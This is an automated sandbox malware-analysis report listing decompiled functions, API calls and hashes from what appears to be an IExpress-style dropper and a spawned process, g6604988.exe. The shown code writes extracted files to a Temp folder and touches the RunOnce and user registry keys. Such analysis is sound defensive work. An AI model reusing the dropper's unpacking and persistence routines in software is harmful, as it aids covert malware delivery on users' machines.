Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 9195569d29e2d929e57c22059dfa9b9a0fe1322ae1ca4f4b0e492afab87d8274
Instruction ID: 46a932d5ab30c550d57ea8d74e35eb6ce9cdc0ffe60d952f90cc9ef3498432a0
Opcode Fuzzy Hash: 9195569d29e2d929e57c22059dfa9b9a0fe1322ae1ca4f4b0e492afab87d8274
Instruction Fuzzy Hash: 7001DCB13002A47FFB2C2A678C86F7F218EDBD4795F04402ABB06E61C09AA8DD4151B5

Uniqueness

Uniqueness Score: -1.00%

Function 00CE19E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CE19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xce8004; // 0xd1db73d
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00CE43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xce9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00CE6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00ce19e0
0x00ce19e0
0x00ce19eb
0x00ce19f2
0x00ce19f9
0x00ce19fc
0x00ce1a01
0x00ce1a2a
0x00ce1a2e
0x00ce1a3e
0x00ce1a4f
0x00ce1a62
0x00ce1a6a
0x00000000
0x00ce1a03
0x00ce1a06
0x00ce1a20
0x00ce1a20
0x00ce1a08
0x00ce1a08
0x00ce1a14
0x00000000
0x00ce1a16
0x00ce1a18
0x00ce1a70
0x00ce1a72
0x00ce1a72
0x00ce1a14
0x00ce1a06
0x00ce1a81

APIs

EndDialog.USER32(?,?), ref: 00CE1A18
GetDesktopWindow.USER32 ref: 00CE1A24
LoadStringA.USER32(?,?,00000200), ref: 00CE1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00CE1A62
MessageBeep.USER32(000000FF), ref: 00CE1A6A

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: d813e919f00c943f5526d8aae860aeaa3ced67f7a8e8a44c23f8c5ee2637a130
Instruction ID: f1dfc4695fca3fb865a485a4b4da4d6aae946b048a944d76f72d53c6e4d46fe9
Opcode Fuzzy Hash: d813e919f00c943f5526d8aae860aeaa3ced67f7a8e8a44c23f8c5ee2637a130
Instruction Fuzzy Hash: 8511A131501189EFDB10EF65DE48BBE77B8EF49310F148164F9269A190DA30AE11EB95

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xce8004; // 0xd1db73d
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xce8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xce8004 = _t39;
				}
				_t37 =  !_t36;
				 *0xce8008 = _t37;
				return _t37;
			}

0x00ce715d
0x00ce7161
0x00ce7165
0x00ce7178
0x00ce7182
0x00ce718e
0x00ce7197
0x00ce71a0
0x00ce71b1
0x00ce71b8
0x00ce71c4
0x00ce71c7
0x00ce71cb
0x00ce71d5
0x00ce71da
0x00ce71da
0x00ce71dc
0x00ce71dc
0x00ce71e2
0x00ce71e5
0x00ce71ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00CE7182
GetCurrentProcessId.KERNEL32 ref: 00CE7191
GetCurrentThreadId.KERNEL32 ref: 00CE719A
GetTickCount.KERNEL32 ref: 00CE71A3
QueryPerformanceCounter.KERNEL32(?), ref: 00CE71B8

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 39b4a9762d1d57252e37d97bb4d21287b3c904670b4f1df83b0d310a7b614bd5
Instruction ID: 956b65b1fb285c379ead877f6831c736d3f68757bbf14a459eca93f03deddc7e
Opcode Fuzzy Hash: 39b4a9762d1d57252e37d97bb4d21287b3c904670b4f1df83b0d310a7b614bd5
Instruction Fuzzy Hash: 37110A71D05248DFCB10DFB9DA88B9EB7F4EF48315F614955E809EB210EA349B048B41

Uniqueness

Uniqueness Score: -1.00%

Function 00CE63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CE63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xce8004; // 0xd1db73d
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00CE1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
				E00CE658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xce9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xce9124 = 0x80070052;
					_t37 = 0;
				}
				return E00CE6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x00ce63cb
0x00ce63d2
0x00ce63d8
0x00ce63ea
0x00ce63f3
0x00ce6401
0x00ce6402
0x00ce6410
0x00ce6415
0x00ce6433
0x00ce6438
0x00ce6449
0x00ce6463
0x00ce646d
0x00ce6477
0x00ce6477
0x00ce647a
0x00ce643a
0x00ce643a
0x00ce6444
0x00ce6444
0x00ce6492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00CE642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00CE645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00CE647A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE63EB

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 1065093856-2356899610
Opcode ID: 25e4c3662277eea36bc39c19ee0ccb36e475a0bc021412e5eb623247ef7bcc63
Instruction ID: bd1102fda00bbaf8814d2cc0f22f9449019da8ed816a169fd9cb8358c282704b
Opcode Fuzzy Hash: 25e4c3662277eea36bc39c19ee0ccb36e475a0bc021412e5eb623247ef7bcc63
Instruction Fuzzy Hash: B8210271A00258AFCB10DF26DCC5FEF7378EB54350F1001A9F595A7280CAB46E848FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1FE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xce8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8);
					if(_t4 == 0) {
						RegDeleteValueA(_v8, 0xce8530);
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00ce1fee
0x00ce2005
0x00ce200d
0x00ce2017
0x00000000
0x00ce2020
0x00ce200d
0x00ce2029

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00CE538C,?,?,00CE538C), ref: 00CE2005
RegDeleteValueA.ADVAPI32(00CE538C,00CE8530,?,?,00CE538C), ref: 00CE2017
RegCloseKey.ADVAPI32(00CE538C,?,?,00CE538C), ref: 00CE2020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00CE1FFB

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce
API String ID: 849931509-2045179639
Opcode ID: 18976c96fd0f1928ac1fb21272d6de98ffca89a9b8d80bf255baf6f07214ae8d
Instruction ID: 419621fd246bc1f2644138b63fd6992af1fbe00e9f4514a2fd8774e8f718353a
Opcode Fuzzy Hash: 18976c96fd0f1928ac1fb21272d6de98ffca89a9b8d80bf255baf6f07214ae8d
Instruction Fuzzy Hash: 17E04F31551398BFEB219B92EC8AF5D7B2DE700740F100194BA09A40A1EB616F18D605

Uniqueness

Uniqueness Score: -1.00%

Function 00CE47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00CE1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0xce91e0; // 0x2ed7c70
						 *(_t34 + 4) = _t11;
						 *0xce91e0 = _t34;
						return 1;
					}
					_t25 =  *0xce8584; // 0x0
					E00CE44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0xce8584; // 0x0
				E00CE44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x00ce47e8
0x00ce47f0
0x00ce47f4
0x00ce480f
0x00ce4811
0x00ce4814
0x00ce4814
0x00ce4816
0x00ce4817
0x00ce4829
0x00ce482b
0x00ce482f
0x00ce484f
0x00ce4852
0x00ce4855
0x00ce4855
0x00ce4857
0x00ce4858
0x00ce4860
0x00ce4865
0x00ce486a
0x00ce486f
0x00000000
0x00ce4876
0x00ce4831
0x00ce4841
0x00ce4847
0x00ce480b
0x00000000
0x00ce480b
0x00ce47f6
0x00ce4806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00CE4E6F), ref: 00CE47EA
LocalAlloc.KERNEL32(00000040,?), ref: 00CE4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00CE4847

Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE4851

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 359063898-2356899610
Opcode ID: 3dc61ed776c1d0359b8bcd4821b78332d6d24b47356b22f56c760dfe854bfd25
Instruction ID: b82bed22f9193dd7e2c949c4acb379ff3775433b8f7c952bec3856b9fe6a5041
Opcode Fuzzy Hash: 3dc61ed776c1d0359b8bcd4821b78332d6d24b47356b22f56c760dfe854bfd25
Instruction Fuzzy Hash: AA11E5B56046C1AFE7289F259C98F7B3B5AEB85310F04851DFA82DB381DA399D068660

Uniqueness

Uniqueness Score: -1.00%

Function 00CE3680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x00ce368c
0x00ce368f
0x00ce3691
0x00ce369f
0x00ce36a7
0x00000000
0x00000000
0x00ce36ba
0x00000000
0x00ce36bc
0x00ce36bc
0x00ce36c0
0x00ce36cb
0x00ce36c2
0x00ce36c4
0x00ce36c4
0x00ce36da
0x00ce36e0
0x00ce36e6
0x00000000
0x00000000
0x00ce36e6
0x00000000
0x00ce36ba
0x00ce36ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00CE369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE36B2
DispatchMessageA.USER32(?), ref: 00CE36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE36DA

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 8bac9ff01cbf9bb748a0410e6b27824d9e7a22e9fe36f474fc83722f91078c3c
Instruction ID: 20318b35348600cd5362184c82f724581de10e5d06749137ce99ba29ecf72a80
Opcode Fuzzy Hash: 8bac9ff01cbf9bb748a0410e6b27824d9e7a22e9fe36f474fc83722f91078c3c
Instruction Fuzzy Hash: A20184729002D4BBDB304AA79C4DFEF7B7CFBC5B10F000119B915E7180D561A640C660

Uniqueness

Uniqueness Score: -1.00%

Function 00CE6517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00CE6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xce9a3c; // 0xce0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00CE44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x00ce651f
0x00ce652a
0x00ce6534
0x00ce656b
0x00ce6577
0x00ce657c
0x00ce6536
0x00ce653e
0x00ce6542
0x00000000
0x00ce6544
0x00ce6547
0x00ce654c
0x00ce6549
0x00ce6549
0x00ce6549
0x00ce655e
0x00ce6560
0x00ce6569
0x00000000
0x00000000
0x00ce6569
0x00ce6542
0x00ce6587

APIs

FindResourceA.KERNEL32(00CE0000,000007D6,00000005), ref: 00CE652A
LoadResource.KERNEL32(00CE0000,00000000,?,?,00CE2EE8,00000000,00CE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00CE6538
DialogBoxIndirectParamA.USER32(00CE0000,00000000,00000547,00CE19E0,00000000), ref: 00CE6557
FreeResource.KERNEL32(00000000,?,?,00CE2EE8,00000000,00CE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00CE6560

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 2f9f1a0570970c3d7eaf4c20d7ad2a0dfde64dd1d3aafcbd76fb1442a2cb9628
Instruction ID: a96cd8fd82c69061ef360d17cfa93a363043f88cf7ff0bee3b7b5c78696257ae
Opcode Fuzzy Hash: 2f9f1a0570970c3d7eaf4c20d7ad2a0dfde64dd1d3aafcbd76fb1442a2cb9628
Instruction Fuzzy Hash: 46012B72201285BFCB105F5A9C48FBF766CEB953A1F010125FE1197150D771DD1096A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE65E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00CE65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x00ce65e8
0x00ce65ed
0x00ce65ef
0x00ce65f2
0x00ce65f4
0x00ce65f4
0x00ce65f6
0x00ce65f7
0x00ce6608
0x00ce6611
0x00ce6618
0x00ce661c
0x00000000
0x00000000
0x00ce660e
0x00ce6623
0x00ce6625
0x00ce663b
0x00ce663b
0x00ce663d
0x00ce6641
0x00ce6610
0x00ce6610
0x00000000
0x00ce6610
0x00ce6644
0x00ce6647
0x00ce6647
0x00ce6621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00CE2B33), ref: 00CE6602
CharPrevA.USER32(?,00000000), ref: 00CE6612
CharPrevA.USER32(?,00000000), ref: 00CE6629
CharNextA.USER32(00000000), ref: 00CE6635

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 02c1c8bba0623862d8be6da1491ddf565116c5692bb18e36a919faa1877d9415
Instruction ID: 3a1743ef41af44c59b574d9fe214145cc826a94eb9e4964f1248ef05f620d052
Opcode Fuzzy Hash: 02c1c8bba0623862d8be6da1491ddf565116c5692bb18e36a919faa1877d9415
Instruction Fuzzy Hash: B2F02D320255D0AED7321B2A4CC8ABFBF9CDFA7394B19416FF4E587001D6350E068661

Uniqueness

Uniqueness Score: -1.00%

Function 00CE69B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0xce81f8 = E00CE6C70();
				__set_app_type(E00CE6FBE(2));
				 *0xce88a4 =  *0xce88a4 | 0xffffffff;
				 *0xce88a8 =  *0xce88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0xce8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0xce851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00CE7000();
				if( *0xce8000 == 0) {
					__setusermatherr(E00CE7000);
				}
				E00CE71EF(_t6);
				return 0;
			}

0x00ce69b7
0x00ce69c2
0x00ce69c8
0x00ce69cf
0x00ce69d8
0x00ce69de
0x00ce69e4
0x00ce69e6
0x00ce69ec
0x00ce69f2
0x00ce69f4
0x00ce6a00
0x00ce6a07
0x00ce6a0d
0x00ce6a0e
0x00ce6a15

APIs

Part of subcall function 00CE6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00CE6FC5

__set_app_type.MSVCRT ref: 00CE69C2
__p__fmode.MSVCRT ref: 00CE69D8
__p__commode.MSVCRT ref: 00CE69E6
__setusermatherr.MSVCRT ref: 00CE6A07

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: c4564ca47590fb63ddfd27a88749b54fa2a7c695f0b2ff69302a8b9c6053a910
Instruction ID: 0aa9db2fa51d360d8c0323af656406bf550930d37b1dc4decd8dd0a17604a625
Opcode Fuzzy Hash: c4564ca47590fb63ddfd27a88749b54fa2a7c695f0b2ff69302a8b9c6053a910
Instruction Fuzzy Hash: 92F01C705193C18FD764AB71FD8E70C3B62FB04331B100A19E469AE2F1CF3A9648DA11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: g6604988.exePID: 4744, Parent PID: 5700COMMON

Executed Functions

Function 011A2BC0 Relevance: 17.1, APIs: 11, Instructions: 569
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 011A2D21
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,?,00000000,00000001,?), ref: 011A2D4F
RegCloseKey.KERNELBASE(?,?,?,00000000,00000001,?), ref: 011A2D5B
RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 011A2E63
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 011A2E91
RegCloseKey.ADVAPI32(80000001), ref: 011A2E9A
GetUserNameA.ADVAPI32(?,?), ref: 011A2FA4
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 011A2FEA
GetSidIdentifierAuthority.ADVAPI32(?), ref: 011A2FF7

Part of subcall function 011A2BC0: GetSidSubAuthorityCount.ADVAPI32(?), ref: 011A310E
Part of subcall function 011A2BC0: GetSidSubAuthority.ADVAPI32(?,00000000), ref: 011A3150

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
